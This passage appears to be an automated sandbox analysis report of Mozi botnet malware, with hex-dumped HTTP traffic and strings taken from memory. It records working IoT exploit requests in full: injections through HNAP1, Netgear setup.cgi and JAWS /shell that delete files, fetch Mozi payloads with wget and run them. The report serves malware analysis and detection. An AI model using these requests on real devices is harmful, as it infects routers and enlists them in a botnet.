23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:47:34 GMTServer: Apache/2.2.3 (Debian)Content-Length: 280Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 32 30 31 2e 34 39 2e 34 31 2e 37 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.3 (Debian) Server at 201.49.41.72 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:47:34 GMTServer: Apache/2.2.22 (Debian)X-Powered-By: PHP/5.4.45-0+deb7u14Vary: Accept-EncodingContent-Length: 2957Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/htmlX-Pad: avoid browser bugData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 52 65 71 75 65 73 74 65 64 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 68 74 6d 6c 20 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 36 25 3b 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 74 61 68 6f 6d 61 2c 76 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 7d 0a 0a 09 62 6f 64 79 20 7b 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 74 61 68 6f 6d 61 2c 76 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 3b 0a 09 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0a 09 09 77 69 64 74 68 3a 39 30 30 70 78 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 7d 0a 09 61 3a 6c 69 6e 6b 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 37 32 43 37 44 3b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 09 61 3a 76 69 73 69 74 65 64 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 37 32 43 37 44 3b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 09 61 3a 68 6f 76 65 72 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 34 35 37 44 43 39 3b 0a 09 7d 20 20 20 20 20 20 0a 09 69 6d 67 20 7b 0a 09 09 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 09 7d 0a 09 23 48 65 61 64 65 72 7b 0a 09 09 77 69 64 74 68 3a 20 39 30 30 70 78 3b 0a 09 09 68 65 69 67 68 74 3a 31 30 34 70 78 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 42 36 44 37 46 46 3b 0a 09 09 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 2e 6a 70 67 22 29 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 62
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.15.8Date: Tue, 16 Nov 2021 14:47:41 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.15.8</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 16 Nov 2021 14:47:51 GMTContent-Type: text/htmlContent-Length: 1198Connection: closeVary: Accept-EncodingData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 37 66 39 3b 20 68 65 69 67 68 74 3a 32 38 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 0a 2e 74 31 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 34 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 38 70 78 3b 7d 0a 2e 74 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 0a 6f 6c 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 20 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 0a 6f 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 31 22 3e e6 82 a8 e7 9a 84 e8 af b7 e6 b1 82 e5 b8 a6 e6 9c 89 e4 b8 8d e5 90 88 e6 b3 95 e5 8f 82 e6 95 b0 ef bc 8c e5 b7 b2 e8 a2 ab e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e8 ae be e7 bd ae e6 8b a6 e6 88 aa ef bc 81 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 32 22 3e e5 8f af e8 83 bd e5 8e 9f e5 9b a0 ef bc 9a 3c 2f 70 3e 0a 09 09 09 3c 6f 6c 3e 0a 09 09 09 09 3c 6c 69 3e e6 82 a8 e6 8f 90 e4 ba a4 e7 9a 84 e5 86 85 e5 ae b9 e5 8c 85 e5 90 ab e5 8d b1 e9 99 a9 e7 9a 84 e6 94 bb e5 87 bb e8 af b7 e6 b1 82 3c 2f 6c 69 3e 0a 09 09 09 3c 2f 6f 6c 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Tue, 16 Nov 2021 14:47:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 42467Connection: closeX-Request-Id: ef485288-6a8c-448a-a0fb-a9632f449634X-Runtime: 0.001219Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 63 2d 53 74 69 63 6b 79 46 6f 6f 74 65 72 20 62 2d 62 72 6f 77 73 65 72 2d 63 68 72 6f 6d 65 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 e6 9d b1 e4 ba ac e3 83 ac e3 82 b8 e3 83 87 e3 83 b3 e3 82 b9 e3 83 9e e3 83 bc e3 82 b1 e3 83 83 e3 83 88 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 bd 8f e5 ae 85 e3 83 9e e3 83 8d e3 83 bc e3 82 92 e3 80 8c e7 9f a5 e3 82 8b e3 81 93 e3 81 a8 e3 80 8d e3 81 8b e3 82 89 e3 81 af e3 81 98 e3 82 81 e3 82 88 e3 81 86 ef bc 81 20 e3 81 93 e3 82 8c e3 81 8b e3 82 89 e3 81 ae e6 99 82 e4 bb a3 e3 80 81 e8 b3 87 e7 94 a3 e5 bd a2 e6 88 90 e3 82 84 e9 81 8b e7 94 a8 e3 81 af e3 81 be e3 81 99 e3 81 be e3 81 99 e9 87 8d e8 a6 81 e3 81 a7 e3 81 99 e3 80 82 e3 81 a7 e3 81 af e3 80 81 e4 bd 8f e3 81 be e3 81 84 e3 81 ae e8 b2 bb e7 94 a8 e3 82 84 e4 be a1 e5 80 a4 e3 82 92 e7 9f a5 e3 82 8b e3 81 93 e3 81 a8 e3 81 af e3 81 a9 e3 81 86 e3 81 a7 e3 81 97 e3 82 87 e3 81 86 e3 81 8b e3 80 82 e3 83 9e e3 83 b3 e3 82 b7 e3 83 a7 e3 83 b3 e3 82 92 e8 b2 b7 e3 81 86 e3 81 9e e3 80 81 e5 a3 b2 e3 82 8b e3 81 9e e3 81 a8 e5 8a 9b e3 82 80 e5 89 8d e3 81 ab e3 80 81 e9 95 b7 e3 81 84 e4 ba ba e7 94 9f e3 81 ae e3 80 8c e4 bd 8f e5 ae 85 e3 83 9e e3 83 8d e3 83 bc e3 80 8d e3 82 92 e5 b0 91 e3 81 97 e6 84 8f e8 ad 98 e3 81 99 e3 82 8b e3 81 93 e3 81 a8 e3 81 8b e3 82 89 e3 81 af e3 81 98 e3 82 81 e3 81 be e3 81 9b e3 82 93 e3 81 8b ef bc 9f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 0a 20 20 20 20 2a 3a 3a 62 65 66 6f 72 65 2c 0a 20 20 20 20 2a 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 35 3b 0a 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 16 Nov 2021 14:48:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closex-amzn-RequestId: e7b030a0-f51e-4aba-ba1c-3db988bfe780Data Raw: 55 73 65 72 20 69 73 20 6e 6f 74 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 70 65 72 66 6f 72 6d 20 74 68 69 73 20 61 63 74 69 6f 6e Data Ascii: User is not authorized to perform this action

Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.m
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.m;
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://%s:%d/bin.sh
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://127.0.0.1
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://127.0.0.1sendcmd
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://HTTP/1.1
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca/upload.php

Source: unknown

HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.128.175.114:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.113.149.148:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 122.201.116.141:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 201.49.41.72:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 216.180.103.7:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Source: /tmp/bin.sh (PID: 6792)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

